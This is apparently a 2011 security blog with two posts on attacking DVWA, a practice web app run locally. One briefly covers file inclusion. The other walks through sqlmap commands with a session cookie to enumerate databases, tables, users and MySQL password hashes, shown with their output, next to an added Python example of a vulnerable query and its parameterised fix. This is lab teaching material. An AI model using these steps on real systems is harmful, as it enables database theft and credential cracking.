October 27, 2011

File Inclusion attack on DVWA

Hey, I am not going to write much about this vulnerability. It's pretty straightforward.
The web developer has given you the ability to include any file from the local system, or even from a remote system. So you can be creative and include any file you want to own the system.

After watching the video, try this URL just to get the perspective:


Now, think as devilish as you can and see what else you can do with this hole ;)
Also, take a look at this exploit already present in the Metasploit framework.


October 19, 2011

Owning DVWA SQLi with sqlmap

Here we go... finally writing this post on SQL injection on DVWA. I was caught up with some really boring office -day job- work and some other things to top that. But that has always been the case with my blogging. It's a sad story.

In this post I will explain the exploitation of SQL injection vulnerability present in DVWA. For details on DVWA and how to get it, please visit my previous post.

sqlmap is an automatic SQL injection and database takeover tool. It is capable of enumerating entire remote databases and performing active database fingerprinting.
Get sqlmap from: http://sqlmap.sourceforge.net/

I am documenting the steps that I carried out to pwn DVWA. You are free to experiment with the different options and parameters of sqlmap; it is a great tool.

Looking for SQL injection in the webapp:
The best way to detect SQL injection in a webapp is to look at its URL. If you are able to change the parameters passed in the URL and that change is reflected in the output of the webapp, you can say that the parameter is being passed to the database at the backend. You will then need to verify whether this indeed allows you to inject SQL into it.
URL for the DVWA SQLi page is: 

After we enter a value (e.g. 1) in the text box, the result is displayed on the page and the URL of the page becomes:

We can see that, after changing the value of the parameter in the URL, different results are obtained.
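Why a parameter that changes the output is worth a closer look: in the vulnerable pattern, the value from the URL is concatenated straight into the SQL text. The following is an added example, not part of the original post and not DVWA's own code: a constructed SQLite stand-in for the `users` table (schema and rows are assumptions), with the concatenating lookup beside its parameterised fix.

```python
import sqlite3

def make_db():
    # Constructed in-memory stand-in for DVWA's `users` table; the schema and
    # rows are assumptions, chosen only to mirror the table sqlmap finds later.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Pablo", "Picasso")])
    return con

def lookup_vulnerable(con, user_id):
    # The bug: the `id` request parameter is spliced into the SQL text, so any
    # quote or keyword the client supplies is parsed as part of the query.
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return con.execute(sql).fetchall()

def lookup_fixed(con, user_id):
    # The fix: a parameterised query. The value is bound as data and can never
    # alter the query's structure, whatever characters it contains.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return con.execute(sql, (user_id,)).fetchall()

def lookup_fixed_typed(con, user_id):
    # Defence in depth: `id` is numeric by design, so reject anything else
    # before it reaches the database at all.
    if not str(user_id).isdigit():
        raise ValueError("user_id must be a non-negative integer")
    return lookup_fixed(con, int(user_id))

if __name__ == "__main__":
    con = make_db()
    probe = "1' OR '1'='1"   # the classic reflected-change test from the text
    print("vulnerable:", lookup_vulnerable(con, probe))   # every row comes back
    print("fixed:     ", lookup_fixed(con, probe))        # no row matches
```

The same tampered value that returns every row through the concatenated query returns nothing through the bound one, which is exactly the behavioural difference sqlmap's detection logic probes for.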
Now, let's check whether this page is vulnerable to SQLi using sqlmap.

./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"

This command can be used to test standalone web pages for SQLi, but in our case, because we are testing a page behind a login page, we are redirected to the login.php page as we are not authenticated. To avoid this, we can use the --cookie flag of sqlmap.
We need to provide the value of the cookie set after we have logged in to DVWA. The cookie value can be found using tools like Burp Suite, WebScarab, etc.

After finding out the cookie value, issue the following command:

./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=bb61j7e8jrsg1r15b6c3sfsk23" --dbs

The --dbs flag lists database names if SQLi is successful.

sqlmap returns with goodies :)

available databases [4]:
[*] dvwa
[*] information_schema
[*] mysql
[*] w3af_test

We will then try to enumerate the tables in one of the databases.
./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=bb61j7e8jrsg1r15b6c3sfsk23" -D dvwa --tables
And we are not disappointed... :)

Database: dvwa

[2 tables]
| guestbook |
| users     |

You can continue to enumerate the target with the rich set of functionality provided by sqlmap. I will show you the mettle of sqlmap straightaway ;)

We can see who the current user is:
./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=bb61j7e8jrsg1r15b6c3sfsk23" --current-user
current user:    'root@localhost'

or list all database users:
./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=bb61j7e8jrsg1r15b6c3sfsk23" --users
database management system users [4]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@''
[*] 'root'@'dojo-desktop'
[*] 'root'@'localhost'

Now that you have the user list, you will want to know their passwords as well. That is why sqlmap provides us with the --passwords flag ;)

./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=bb61j7e8jrsg1r15b6c3sfsk23" --users --passwords

database management system users password hashes:
[*] debian-sys-maint [1]:
    password hash: *3F436344A61D99410B1DD47F05788FD5DD72E483
[*] root [1]:
    password hash: *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC

Crack these hashes and enjoy ;)